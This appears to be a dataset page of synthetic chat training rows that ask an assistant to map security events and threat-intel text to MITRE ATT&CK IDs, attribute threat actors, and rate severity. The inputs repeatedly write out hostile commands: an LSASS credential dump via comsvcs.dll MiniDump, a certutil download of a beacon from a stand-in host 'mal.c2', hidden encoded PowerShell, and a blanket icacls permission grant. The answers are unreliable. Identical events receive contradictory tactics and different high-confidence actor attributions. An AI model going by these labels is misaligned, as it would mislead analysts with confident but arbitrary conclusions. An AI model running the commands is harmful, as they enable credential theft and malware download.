messages listlengths 2 2 |
|---|
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 2866 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.107.221.24",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\", \"TA0003\",... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: Fileless, Base64, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: TLS, WMI, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confidence\": \"High\"}",... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 1090 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.31.213.154",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-1YGI0I90N7)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Credential Access, Discovery",
"role": "user"
},
{
"conten... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: The SSP configuration is stored in two Registry keys: HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages and HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security Packages.",
"role": "us... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 2932 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.20.230.218",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\",... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, TLS, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confidence... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 3969 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.34.240.253",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\"], \"tech... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-V7DAO0CSZV)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Execution",
"role": "user"
},
{
"content": "{\"severity\":... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Kazuar has used compromised WordPress blogs as C2 servers.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1102.002\", \"T1102\"]}",
"role": "assistant"
}
] |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 2521 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.112.244.78",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"technique... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.171.46.145",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\", \"TA0001\"], \"techniqu... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-CSWDXQCR6X)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Execution, Credential Access",
"role": "user"
},
{
"content": "... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: The macro contains a PowerShell script to persist in the \"Run\" registry key, \"KCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SystemTextEncoding\".",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Example services include websites, email services, DNS, and web-based applications.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"T1499\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-LAPLGNU20T)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Defense Evasion, Exfiltration",
"role": "user"
},
{
"content": "{\"se... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: The Winnti for Windows dropper can decrypt and decompresses a data blob.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1140\"]}",
"role": "assistant"
}
] |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0042\"], \"techniques\": [\"T1583\", \"T1583.002\"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2817 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, Base64, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\", ... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-XBS1RBP1UX)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Credential Access, Privilege Escalation, Initial Access",
"role": "user"... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: The AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1546\",... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Monitor for changes to windows registry keys or values that may target multi-factor authentication mechanisms, such as smart cards, to gain access to credentials that can be used to access systems, services, and netw... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 771 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, Fileless, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"confi... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-QJHJKROLRP)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Initial Access, Persistence",
"role": "user"
},
{
"content": "{... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.84.33.10",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0043\"], \"techniques\": ... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-YGKBNB3LXH)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Impact, Defense Evasion, Initial Access",
"role": "user"
},
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, LOLBin, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spide... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Kerberos is an authentication protocol widely used in modern Windows domain environments.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1558\"]}",
"role": "assistan... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: PLATINUM has sometimes used drive-by attacks against vulnerable browser plugins.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0001\"], \"techniques\": [\"T1189\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: WMI, JA3 Spoof, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"confid... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Prikormka creates a directory, %USERPROFILE%\\AppData\\Local\\SKC\\, which is used to store collected log files.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1074.001\", \"T1074\"]}",
... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.170.93.173",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0008\... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Azorult can download and execute additional files.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1105\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1887 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, TLS, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\", \"confide... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.104.150.30",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\", \"TA004... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3969 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, Fileless, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"conf... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: njRAT is capable of manipulating and deleting registry keys.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1070\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-K9J6I9FIH7)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Command and Control, Execution",
"role": "user"
},
{
"content": "{\"sev... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Prikormka uses DLL search order hijacking for persistence by saving itself as ntshrui.dll to the Windows directory so it will load before the legitimate ntshrui.dll saved in the System32 subdirectory.",
"role": "user"
... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-BRVVCGM3TQ)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Exfiltration, Reconnaissance",
"role": "user"
},
{
"content": "... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2852 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, JA3 Spoof, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spider\... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1812 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, LOLBin, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\", \"co... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 2339 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.27.197.197",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\"], ... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: Fileless, WMI, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"confidence\": \"Hig... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-OOGNO041DE)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Execution",
"role": "user"
},
{
"content": "{\"severity\": \... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 3609 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.79.90.69",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0008\", \"... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.44.114.238",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0043\", \"TA0003\", \"TA0004\"], \"t... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-2G9HCYWQ4N)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Exfiltration, Initial Access, Collection",
"role": "user"
},
{
"... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.3/TCP connection to 1.175.112.215",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\"], \"techniques\":... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: WMI, LOLBin, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\", \"con... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.192.63.161",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\", \"TA000... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-BHDB0LWP1N)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Collection, Defense Evasion",
"role": "user"
},
{
"cont... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: PoshC2 contains multiple modules for injecting into processes, such as Invoke-PSInject.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\", \"TA0005\"], \"techniques\": [\"T1055\"]}",
"role": "assi... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, JA3 Spoof, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"c... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-T9YOL7AVXQ)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Defense Evasion, Reconnaissance",
"role": "user"
},
{
"content": "{\"se... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, Fileless, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\",... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-MWD7L4UDBA)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Lateral Movement, Execution, Exfiltration",
"role": "user"
},
{
"content":... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: icacls . /grant Everyone:F /T /C /Q",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1222\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-3WFYI8L3QF)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Initial Access, Command and Control",
"role": "user"
},
{
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: LOLBin, JA3 Spoof, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", ... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.186.250.228",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2794 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, Fileless, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"conf... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: LaZagne can perform credential dumping from LSA secrets to obtain account and password information.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1003\", \"T1003.004\"]... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 2852 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.63.231.167",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0043\", \"TA0011\"], \"techniques... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.3/TCP connection to 1.2.244.75",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA00... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: CoinTicker decodes the initially-downloaded hidden encoded file using OpenSSL.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1140\"]}",
"role": "assistant"
}
] |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: ZxShell has a feature to capture a remote computer's keystrokes using a keylogger.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\", \"TA0009\"], \"techniques\": [\"T1056.001\", \"T1056\"]}",
"ro... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.82.173.167",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\", \"TA0004\"], \"techni... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-7LYGVP8B2V)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Privilege Escalation",
"role": "user"
},
{
"content": "{\... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, Base64, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"conf... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-316QVWA766)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Reconnaissance, Privilege Escalation, Credential Access",
"role": "user... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-FG56U5MFUU)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Discovery, Defense Evasion, Impact",
"role": "user"
},
{
"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, TLS, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\", \... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2195 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, Base64, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"con... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.70.51.107",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0001\"], \"techniques\": [\"T156... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.35.93.50",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\", \"TA0003\"], \"techniques\": [... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-8Q9SPIDWFF)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Defense Evasion, Privilege Escalation, Lateral Movement",
"role": "user"
},
... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-EQVXOBE9KN)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Command and Control",
"role": "user"
},
{
"content": "{\"severity\": \"Extr... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-KS6P9JP91Y)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Privilege Escalation, Lateral Movement",
"role": "user"
},
{
... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-ME0CRCDDVM)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Reconnaissance",
"role": "user"
},
{
"content": "{\"severity\... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-0FM7INFTR7)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Reconnaissance, Credential Access, Collection",
"role": "user"
},
{
"co... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1101 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, TLS, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confidence... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Machete has a feature to copy files from every drive onto a removable drive in a hidden folder.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\"], \"techniques\": [\"T1052\", \"T1052.001\"]}",
"r... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: JA3 Spoof, Fileless, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"confidence\":... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-TP5JYU7HXE)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Exfiltration, Execution",
"role": "user"
},
{
"content": "{\"sev... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, LOLBin, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\", \... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: WMI, Fileless, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"confide... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-6WQAJDESKL)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Persistence",
"role": "user"
},
{
"content": "{\"severity\... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 2293 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.112.38.104",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\", \"TA0010... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1133 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, JA3 Spoof, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"confid... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, TLS, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\", \"c... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, JA3 Spoof, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", ... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 1334 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.145.247.21",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0043\", \"TA0009\"], \"... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.148.200.131",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\", \"TA0006\", ... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-FTXUHBX8BI)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Defense Evasion",
"role": "user"
},
{
"content": "{\"severity\": \"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2332 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, JA3 Spoof, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confidenc... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Organizations may consider weighing the risk of storing credentials in password stores and web browsers.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1555\"]}",
"r... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: For example, on macOS systems the screensharingd process may be related to VNC connection activity.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1021.005\", \"T1021\"]}",
... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.